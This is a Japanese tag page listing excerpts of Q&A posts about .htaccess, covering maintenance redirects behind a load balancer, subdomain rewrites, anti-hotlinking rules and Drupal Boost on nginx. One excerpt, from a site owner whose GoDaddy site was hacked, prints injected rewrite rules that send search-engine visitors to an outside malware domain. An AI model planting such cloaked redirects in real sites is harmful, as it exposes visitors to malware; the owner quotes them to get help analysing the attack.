タグ付けされた質問 「.htaccess」

ロードバランサーの背後にWebサーバーがあります。 メンテナンスのためにサイトをオフラインにするたびにメンテナンスページを表示するには、.htaccessに条件付きリダイレクトを追加する必要があります。この部分は簡単です： RewriteEngine on RewriteCond %{REQUEST_URI} !/maintenance.php$ [NC] RewriteCond %{REQUEST_URI} !\.(jpe?g?|png|gif) [NC] RewriteRule .* /maintenance.php [R=302,L] ただし、訪問者のIPアドレスが自分のものである場合は、メンテナンスページにリダイレクトされず、オンラインであるかのようにサイトを表示およびテストできるという条件を追加します。この部分も通常は簡単です。 RewriteEngine on RewriteCond %{REMOTE_ADDR} !^11\.111\.111\.111 RewriteCond %{REQUEST_URI} !/maintenance.php$ [NC] RewriteCond %{REQUEST_URI} !\.(jpe?g?|png|gif) [NC] RewriteRule .* /maintenance.php [R=302,L] ただし、私のWebサーバーはロードバランサーの背後にあるため、REMOTE_ADDRロードバランスサーバーの内部IPアドレスに解決されます。 これを変更して、転送されたIPアドレスを探すにはどうすればよいですか？私はPHPで$_SERVER['HTTP_X_FORWARDED_FOR']転送されたIPアドレスを取得するために使用できることを知っています。私はいくつかのことを試しました.htaccessが、うまくいきませんでした： %{X_FORWARDED_FOR} %{HTTP:X_FORWARDED_FOR} %{HTTP_X_FORWARDED_FOR} 解決 私は以下を機能させました： %{HTTP:X-FORWARDED-FOR}

9 linux  apache-2.2  php  .htaccess  lamp 

私のサイトはハッキングされており、現時点ではいくつかの詳細を知っていますが、それがどのように発生したのか、または将来的にそれを防ぐ方法に正確に途方に暮れています。攻撃が再び発生するのを防ぐため、攻撃を分析するためにあなたの助けが必要です。これは少し長いですが、問題の解決に役立つ十分な情報を提供したいと思います。 これが起こったことです。 数週間前、ホスティング会社のGoDaddyからメールが届きました。私のサイトはリソースを使いすぎており、MySQLクエリが原因であると予想していました。問題のクエリは、5〜6語の検索クエリでした。私が設定した方法では、検索する用語が多いほど、クエリが複雑になります。問題ない。私はそれを修正しましたが、同時にGoDaddyも一時的に私のアカウントをシャットダウンし、すべてが正常に戻るまでに約3日かかりました。 その事件の後、私の検索エンジンのトラフィックは劇的に、約90％減少しました。私はそれを何も考えていなかったので、それをクエリの大失敗に書いて、グーグルがサイトを再クロールしたときにそれが時間内に戻ると考えて、それはうんざりしました。そうではなかった。 数日前、自分のサイトでマルウェアがホストされているというメールがユーザーから届きました。ブラウザに直接サイトを読み込みましたが、ページに何も挿入されていませんでした。次に、.htaccessファイルを確認したところ、次のことがわかりました。 <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 …

9 .htaccess  ftp  hacking  godaddy 

の達人 私は単純な.htaccessファイルを持っていますが、私のWebアプリケーションでは、www以外をwwwにリダイレクトするだけです。今私がしたいのは http：//subdomain.mydomain.tldのような新しい仮想ホストを作成します app / webroot / subdomainのような私のアプリのフォルダに、そのサブドメインに来る人のためのリダイレクトを作成します 私の現在の.htaccessは次のようになります <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{HTTP_HOST} !^www\.mydomain\.tld [NC] RewriteRule ^(.*)$ http://www.mydomain.tld/$1 [R=301.L] RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ app/webroot/$1 [QSA,L] </IfModule> どうすればいいですか？これをすべて.htaccessファイルで行うことはできますか、それともGoDaddyをいじる必要がありますか？それが理にかなっている場合、私はむしろアプリでこれをしません。 Ubuntu 10.04 + Apache 2.2.14-5を実行しています ありがとう

8 apache-2.2  .htaccess  mod-rewrite  ubuntu  subdomain 

「究極の」アンチホットリンク.htaccessを記述しようとしています... あなたはネット上で多くの例/チュートリアル / ジェネレータを見つけることができますが、それらの多くは間違っているか不完全です（あるいはその両方です）。 これらは私が探している機能です： HTTP_REFERERが外部サイトである場合、ファイル拡張子のリストのホットリンクをブロックする必要があります。 .htaccessでハードコーディングせずに、現在のドメイン（duh）のホットリンクを許可する必要があります。 現在のドメインでは、httpおよびhttpsで動作する必要があります。 現在のドメインでは、wwwあり、wwwなしで機能する必要があります。 例外ドメインをこれらのルールに追加できる必要があります（友人のGoogleなど）。これらのドメインは、httpおよびhttpsで、wwwありまたはwwwなしで機能する必要があります。 これは私がこれまでに達成したことです： <IfModule mod_rewrite.c> Options +FollowSymlinks RewriteEngine On RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?mydomain.com/.*$ [NC] RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?google.com/.*$ [NC] RewriteRule \.(gif|jpe?g|png|zipx?)$ - [NC,F] </IfModule> 私の質問： mydomain.com.htaccessのハードコードを回避する方法は？（この.htaccessをドメインごとに変更せずにすべてのドメインに展開できると便利です。） 私のRewriteRuleでは、右gif|jpe?g|png|zipx?と同等gif|jpg|jpeg|png|zip|zipxですか？（申し訳ありませんが正規表現ではまだ新しいです。） 私の知らない私の.htaccessに何か悪いことを見ますか？ ＃1については、ある程度可能であることがわかっています。私が見つけた最も近いものは、ドメインをハードコーディングせずにURLからwwwを削除するこのスニペットです。この方法を私の質問1に使用する方法はありますか？ RewriteCond %{HTTP_HOST} ^www\.(.+) RewriteCond %{HTTPS}s/%1 ^(on(s)|offs)/(.+) RewriteRule ^ http%2://%3%{REQUEST_URI} [L,R=301] 更新： 通常の画像の代わりに透かし入りの画像を提供するソリューションを知っています。しかし、私はこの種の解決策を探していません。すべての種類のバイナリファイル（zip、exe、iso、jpg、png、gif …

8 apache-2.2  .htaccess  bandwidth-control  hotlinking 

Boostモジュールをインストールしてnginxで動作させようとしています。私たちが知っているように、BoostはApacheのようにnginxディレクティブを生成しません。 Boostには、Apacheの.htaccess用の次のディレクティブがあります。 ### BOOST START ### # Allow for alt paths to be set via htaccess rules; allows for cached variants (future mobile support) RewriteRule .* - [E=boostpath:normal] # Caching for anonymous users # Skip boost IF not get request OR uri has wrong dir OR cookie is set OR …

nginx  .htaccess  drupal7